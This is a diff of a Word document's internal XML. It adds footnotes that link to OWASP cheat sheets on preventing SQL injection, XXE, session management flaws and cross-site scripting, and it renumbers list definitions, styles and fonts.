+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Notedebasdepage"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html</w:t>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:id="3">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Notedebasdepage"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html</w:t>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:id="4">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Notedebasdepage"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html</w:t>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:id="5">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Notedebasdepage"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html</w:t>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:id="6">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Notedebasdepage"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html</w:t>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:id="7">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Notedebasdepage"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html</w:t>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:id="8">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Notedebasdepage"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:id="9">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Notedebasdepage"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:id="10">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Notedebasdepage"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:id="11">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Notedebasdepage"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:id="12">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Notedebasdepage"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:id="13">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Notedebasdepage"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:id="14">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Notedebasdepage"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:id="15">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Notedebasdepage"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:id="16">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Notedebasdepage"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
       </w:r>
     </w:p>
   </w:footnote>
@@ -1899,6 +5389,118 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="3C2C16E3"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="2EF6EE44"/>
+    <w:lvl w:ilvl="0" w:tplc="54907EF6">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Wingdings" w:cstheme="minorBidi" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="040C0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="040C0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="040C0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="040C0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="040C0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="040C0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="040C0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6840" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="040C0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="7560" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4A5A1099"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="4268E1E0"/>
@@ -1985,7 +5587,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="54B27D0C"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="0409001D"/>
@@ -2071,10 +5673,10 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="686D5D4F"/>
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="665B0742"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="B6C2D42E"/>
+    <w:tmpl w:val="416A07CC"/>
     <w:lvl w:ilvl="0" w:tplc="040C0001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -2184,7 +5786,120 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="686D5D4F"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="B6C2D42E"/>
+    <w:lvl w:ilvl="0" w:tplc="040C0001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="040C0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="040C0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="040C0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="040C0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="040C0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="040C0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="040C0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="040C0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="7200" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6D702056"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="04090023"/>
@@ -2271,7 +5986,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7273740B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="0409001F"/>
@@ -2394,22 +6109,28 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="12">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="13">
+    <w:abstractNumId w:val="13"/>
+  </w:num>
+  <w:num w:numId="14">
     <w:abstractNumId w:val="12"/>
   </w:num>
-  <w:num w:numId="14">
-    <w:abstractNumId w:val="11"/>
-  </w:num>
   <w:num w:numId="15">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="16">
     <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="17">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="15"/>
+  </w:num>
+  <w:num w:numId="18">
+    <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="19">
+    <w:abstractNumId w:val="14"/>
   </w:num>
 </w:numbering>
 </file>
@@ -2435,7 +6156,7 @@
   <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="376">
     <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
     <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="3" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="4" w:unhideWhenUsed="1" w:qFormat="1"/>
     <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="4" w:unhideWhenUsed="1" w:qFormat="1"/>
     <w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="3" w:unhideWhenUsed="1" w:qFormat="1"/>
     <w:lsdException w:name="heading 5" w:semiHidden="1" w:uiPriority="3" w:unhideWhenUsed="1" w:qFormat="1"/>
@@ -2471,7 +6192,7 @@
     <w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="envelope address" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="envelope return" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footnote reference" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="footnote reference" w:semiHidden="1" w:uiPriority="5" w:unhideWhenUsed="1" w:qFormat="1"/>
     <w:lsdException w:name="annotation reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="line number" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="page number" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -2813,7 +6534,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="000D3F41"/>
+    <w:rsid w:val="00C63279"/>
     <w:rPr>
       <w:kern w:val="24"/>
     </w:rPr>
@@ -5083,13 +8804,6 @@
     <w:pitch w:val="variable"/>
     <w:sig w:usb0="E0002EFF" w:usb1="C000785B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
   </w:font>
-  <w:font w:name="Courier New">
-    <w:panose1 w:val="02070309020205020404"/>
-    <w:charset w:val="00"/>
-    <w:family w:val="modern"/>
-    <w:pitch w:val="fixed"/>
-    <w:sig w:usb0="E0002EFF" w:usb1="C0007843" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
-  </w:font>
   <w:font w:name="Wingdings">
     <w:panose1 w:val="05000000000000000000"/>
     <w:charset w:val="02"/>
@@ -5104,6 +8818,13 @@
     <w:family w:val="auto"/>
     <w:pitch w:val="variable"/>
     <w:sig w:usb0="00000003" w:usb1="288F0000" w:usb2="00000016" w:usb3="00000000" w:csb0="00040001" w:csb1="00000000"/>
+  </w:font>
+  <w:font w:name="Courier New">
+    <w:panose1 w:val="02070309020205020404"/>
+    <w:charset w:val="00"/>
+    <w:family w:val="modern"/>
+    <w:pitch w:val="fixed"/>
+    <w:sig w:usb0="E0002EFF" w:usb1="C0007843" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
   </w:font>
   <w:font w:name="SimHei">
     <w:altName w:val="黑体"/>
@@ -5162,8 +8883,9 @@
   <w:rsids>
     <w:rsidRoot w:val="00D3385B"/>
     <w:rsid w:val="0046769F"/>
+    <w:rsid w:val="0060286A"/>
     <w:rsid w:val="00D3385B"/>
-    <w:rsid w:val="00DC22BC"/>
+    <w:rsid w:val="00DE2DB8"/>
   </w:rsids>
   <m:mathPr>
     <m:mathFont m:val="Cambria Math"/>
@@ -6098,7 +9820,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{68E1302D-60A2-4D57-8734-740A4BDC4EF0}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{9B4919A4-B289-43D6-8B5A-4632137A2DE9}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
